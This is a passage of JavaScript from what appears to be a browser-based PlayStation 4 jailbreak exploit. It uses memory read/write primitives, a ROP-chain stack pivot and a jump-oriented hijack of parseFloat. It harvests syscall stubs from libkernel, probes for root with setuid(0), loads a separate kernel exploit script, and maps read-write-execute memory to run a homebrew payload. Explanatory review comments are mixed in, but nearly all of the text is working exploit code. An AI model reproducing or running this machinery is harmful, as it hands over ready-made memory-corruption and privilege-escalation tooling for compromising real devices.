                chain.push(gadgets["pop rsp"]);
                chain.push(returnToFrame); // -> back to the trap life
                chain.count = ocnt;

                // Hijack splice's return: "pop rsp" with chain.stackBase as its operand.
                p.write8(stackPointer, (gadgets["pop rsp"])); // pop pop
                p.write8(stackPointer.add32(8), chain.stackBase); // rop rop
            }
        }
    };

    funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));   // backing store of the pinned Uint32Array

    p.write8(funcbuf.add32(0x30), gadgets["setjmp"]);
    p.write8(funcbuf.add32(0x80), gadgets["jop"]);
    p.write8(funcbuf, funcbuf);
    p.write8(parseFloatStore, gadgets["jop"]);
    var orig_hold = p.read8(holdz1);
    var orig_hold48 = p.read8(holdz1.add32(0x48));

    p.write8(holdz1, funcbuf.add32(0x50));
    p.write8(holdz1.add32(0x48), funcbuf);
    parseFloat(hold2, hold2, hold2, hold2, hold2, hold2);
    p.write8(holdz1, orig_hold);
    p.write8(holdz1.add32(0x48), orig_hold48);

    stackPointer = p.read8(funcbuf.add32(0x10));
    rtv = Array.prototype.splice.apply(reenter_help);
    return p.leakval(rtv);
}
273 |
gadgets = gadgets;             // no-op self-assignment, left as found
p.loadchain = launch_chain;    // presumably what window.rop's run() calls to pivot onto the chain (rop.js is not in view)
276 |
function swapkeyval(json) {
    // Build a new object that maps each own value of `json` back to its key.
    // Values are coerced to property names, so they should be unique strings
    // or numbers; when two keys share a value, the later one wins. Inherited
    // properties are ignored, and a null/undefined input yields {}.
    var inverted = {};
    var owns = Object.prototype.hasOwnProperty;
    for (var name in json) {
        if (!owns.call(json, name)) {
            continue;
        }
        inverted[json[name]] = name;
    }
    return inverted;
}
286 |
// Alias kview over libkernel the same way wkview was aliased over WebKit
// (data pointer at +0x10, length 8 bytes after it). The original pointer is
// saved but not restored within this chunk.
var kview = new Uint8Array(0x1000);
var kstr = p.leakval(kview).add32(0x10);
var orig_kview_buf = p.read8(kstr);

p.write8(kstr, window.libKernelBase);
p.write4(kstr.add32(8), 0x40000);

// Find the first occurrence of the ASCII bytes "rdloc" (presumably the start
// of libkernel's string data, e.g. from a "...rdlock" symbol name) and use
// its offset as the end of the code region worth scanning. If the marker is
// absent, countbytes stays undefined: the length write below receives NaN
// (what write4 does with that is not visible here) and the stub loop never
// runs, so window.syscalls stays empty and every p.syscall throws
// "invalid syscall".
var countbytes;
for (var i = 0; i < 0x40000; i++) {
    if (kview[i] == 0x72 && kview[i + 1] == 0x64 && kview[i + 2] == 0x6c && kview[i + 3] == 0x6f && kview[i + 4] == 0x63) {
        countbytes = i;
        break;
    }
}
p.write4(kstr.add32(8), countbytes + 32);   // shrink the view to the scanned region plus slack for the 12-byte pattern below

// Build the syscall table by pattern-matching libkernel's syscall stubs:
//   48 c7 c0 imm32   mov rax, imm32    (imm32 = syscall number)
//   49 89 ca         mov r10, rcx
//   0f 05            syscall
// The imm32 is reassembled through a Uint32 view in host byte order
// (little-endian on the x86-64 target, matching the encoding); each match
// maps syscall number -> address of the stub's first byte.
var dview32 = new Uint32Array(1);
var dview8 = new Uint8Array(dview32.buffer);
for (var i = 0; i < countbytes; i++) {
    if (kview[i] == 0x48 && kview[i + 1] == 0xc7 && kview[i + 2] == 0xc0 && kview[i + 7] == 0x49 && kview[i + 8] == 0x89 && kview[i + 9] == 0xca && kview[i + 10] == 0x0f && kview[i + 11] == 0x05) {
        dview8[0] = kview[i + 3];
        dview8[1] = kview[i + 4];
        dview8[2] = kview[i + 5];
        dview8[3] = kview[i + 6];
        var syscallno = dview32[0];
        window.syscalls[syscallno] = window.libKernelBase.add32(i);
    }
}

var chain = new window.rop;   // single ROP chain object reused by every p.fcall_ call
var returnvalue;              // rax captured by the last p.fcall_, handed back by p.fcall
318 |
p.fcall_ = function (rip, rdi, rsi, rdx, rcx, r8, r9) {
    // Call native code at `rip` with up to six integer arguments via the
    // shared ROP chain and leave rax in the file-level `returnvalue`.
    // Returns nothing; p.fcall is the wrapper that hands the value back.
    // Throws if the chain did not run through to its final marker.
    var g = window.gadgets;
    var marker = 0x41414242;

    chain.clear();

    // One-shot "notimes" flag set by the caller on `this`; it resets to 1 after every call.
    chain.notimes = this.next_notime;
    this.next_notime = 1;

    // The call itself, followed by "mov [rdi], rax" into the top slot of the
    // chain's stack buffer so the result survives the pivot back.
    chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
    chain.push(g["pop rdi"]);
    chain.push(chain.stackBase.add32(0x3ff8));
    chain.push(g["mov [rdi], rax"]);

    // Known marker in rax so run()'s result proves the whole chain executed.
    chain.push(g["pop rax"]);
    chain.push(p.leakval(marker));

    var ran = chain.run();
    if (ran.low != marker) throw new Error("unexpected rop behaviour");
    returnvalue = p.read8(chain.stackBase.add32(0x3ff8));
}
337 |
p.fcall = function () {
    // Public call wrapper: forward every argument to p.fcall_ unchanged,
    // keeping `this` (p.fcall_ reads next_notime from it), and hand back the
    // rax value it stored in `returnvalue`. p.fcall_ itself returns nothing,
    // so there is no intermediate result to keep.
    p.fcall_.apply(this, arguments);
    return returnvalue;
}
342 |
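p.readstr = function (addr, maxlen) {
    // Read a NUL-terminated byte string at `addr` and return it as a JS
    // string, one char per byte (Latin-1 style, no UTF-8 decoding).
    //
    // addr   : pointer object; copied first so the in-place bumps below never
    //          modify the caller's value.
    // maxlen : optional cap on the number of characters returned. Omitted
    //          means unbounded, as before. Pass it when the target memory is
    //          untrusted or may lack a terminator: an unbounded scan walks
    //          forward until it meets a 0 byte or unmapped memory.
    //
    // Reads go through p.read4 one 32-bit word at a time and all four bytes
    // of each word are consumed before the pointer advances, so the range of
    // memory touched never exceeds what the original byte-stepped loop
    // touched (it also read 4 bytes at every position).
    var cursor = addr.add32(0);
    var limit = (typeof maxlen === "number") ? maxlen : Infinity;
    var out = "";

    while (out.length < limit) {
        var word = p.read4(cursor);
        for (var shift = 0; shift < 32; shift += 8) {
            var byteval = (word >>> shift) & 0xFF;
            if (byteval === 0 || out.length >= limit) {
                return out;
            }
            out += String.fromCharCode(byteval);
        }
        cursor.add32inplace(4);
    }
    return out;
}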
354 |
p.syscall = function (sysc, rdi, rsi, rdx, rcx, r8, r9) {
    // Invoke a libkernel syscall stub through the ROP call primitive.
    // `sysc` is either a name looked up in window.syscallnames or a raw
    // number. Anything else is rejected — including a name that resolves to
    // a non-number (e.g. an inherited property such as "constructor") and a
    // number for which the stub scan found no entry. Returns rax, as p.fcall does.
    var number = sysc;
    if (typeof number === "string") {
        number = window.syscallnames[number];
    }
    if (typeof number !== "number") {
        throw new Error("invalid syscall");
    }

    var stub = window.syscalls[number];
    if (stub == null) {
        throw new Error("invalid syscall");
    }

    return p.fcall(stub, rdi, rsi, rdx, rcx, r8, r9);
}
370 |
p.stringify = function (str) {
    // Copy `str` into a pinned, NUL-terminated byte buffer and return the
    // address of that buffer. Only the low byte of each char code is kept,
    // so anything outside Latin-1 is silently truncated, and an embedded
    // "\0" in `str` ends the C string early. The trailing slot is never
    // written and a fresh typed array is zero-filled, which supplies the
    // terminator. The array is parked in window.nogc so it stays alive.
    var count = str.length;
    var bytes = new Uint8Array(count + 1);
    for (var pos = 0; pos < count; pos++) {
        bytes[pos] = str.charCodeAt(pos) & 0xFF;
    }
    window.nogc.push(bytes);
    return p.read8(p.leakval(bytes).add32(0x10));
};
379 |
p.malloc = function malloc(sz) {
    // Hand out `sz` bytes of addressable memory backed by a typed array that
    // is over-allocated by 0x10000 bytes (the reason is not stated here —
    // presumably to force a stable, out-of-line backing store) and pinned in
    // window.nogc. Returns the backing-store address read from the view's
    // storage slot at +0x10, with the JS array reachable as `.backing`.
    var pinned = new Uint8Array(0x10000 + sz);
    window.nogc.push(pinned);
    var address = p.read8(p.leakval(pinned).add32(0x10));
    address.backing = pinned;
    return address;
}
387 |
p.malloc32 = function malloc32(sz) {
    // Same as p.malloc but sized for `sz` 32-bit words; `.backing` is a
    // Uint32Array view over the whole padded buffer (pad included), so
    // backing[0] corresponds to the returned address.
    var byteLength = 0x10000 + sz * 4;
    var pinned = new Uint8Array(byteLength);
    window.nogc.push(pinned);
    var address = p.read8(p.leakval(pinned).add32(0x10));
    address.backing = new Uint32Array(pinned.buffer);
    return address;
}
395 |
// Test if the kernel is already patched: setuid(0) succeeding (the int64
// result is compared by its string form, '0') means a previous run already
// patched the kernel and the kernel exploit can be skipped.
var test = p.syscall("sys_setuid", 0);

if (test != '0') {
    // Kernel not patched, run kernel exploit: kernel.js is loaded as a script
    // from the same location as this page and continues from window.* state.
    sc = document.createElement("script");   // NOTE(review): `sc` is assigned without var (implicit global)
    sc.src = "kernel.js";
    document.body.appendChild(sc);
} else {
    // Already root: setlogin("root") is used as a probe (presumably for the
    // Mira payload, going by the name); a non-zero result reloads the page
    // so the whole stage is retried.
    var testMira = p.syscall("sys_setlogin", p.stringify("root"))
    if(testMira != '0')
    {
        location.reload();
    }
    else
    {
        // All done all done!
        showtime();
    }
}
416 | }
417 |
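window.setRTC = function(year, month, day, hours, minutes, seconds)
{
    // Map an RWX region at a fixed hint address, write the HEN-VTX payload
    // into it with the requested RTC offset, then jump to it.
    //
    // year..seconds go straight into the Date constructor, so `month` is
    // 0-based (January == 0) like the rest of the Date arguments.
    //
    // Changes versus the original: the mapping result is checked before
    // anything is written or executed (previously p.fcall(code_addr) ran even
    // when the mapping did not land at code_addr), the computed offset is
    // validated, and the epoch literal is plain decimal (the original `01` is
    // a legacy octal literal, a syntax error in strict-mode and module code).
    var code_addr = new int64(0x26100000, 0x00000009);
    // prot 7 = PROT_READ|PROT_WRITE|PROT_EXEC, writable and executable on
    // purpose: the payload is written here and then called. The flags value
    // and why the hint is expected to be honoured are firmware specifics not
    // visible here, hence the explicit address comparison below.
    var buffer = p.syscall("sys_mmap", code_addr, 0x300000, 7, 0x41000, -1, 0);

    // The int64 result is compared by its string form, as elsewhere in this file.
    if (buffer != '926100000') {
        throw new Error("sys_mmap did not return the expected address: " + buffer);
    }

    // Seconds between the payload's epoch and the requested time.
    // NOTE(review): month 1 here is 1 February 2012 (Date months are 0-based);
    // the value is kept from the original — confirm that is the intended epoch.
    var epoch = new Date(2012, 1, 1, 0, 0, 0);
    var target = new Date(year, month, day, hours, minutes, seconds);
    var timetoset = (target.getTime() - epoch.getTime()) / 1000;
    if (!isFinite(timetoset)) {
        throw new Error("setRTC: invalid date arguments");
    }

    // Load HEN-VTX
    writeHomebrewEN(p, code_addr.add32(0x100000), timetoset);
    alert(timetoset);   // debug readout of the offset written into the payload

    // Launch HEN-VTX
    p.fcall(code_addr);
    alert("Success");
}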
436 |
--------------------------------------------------------------------------------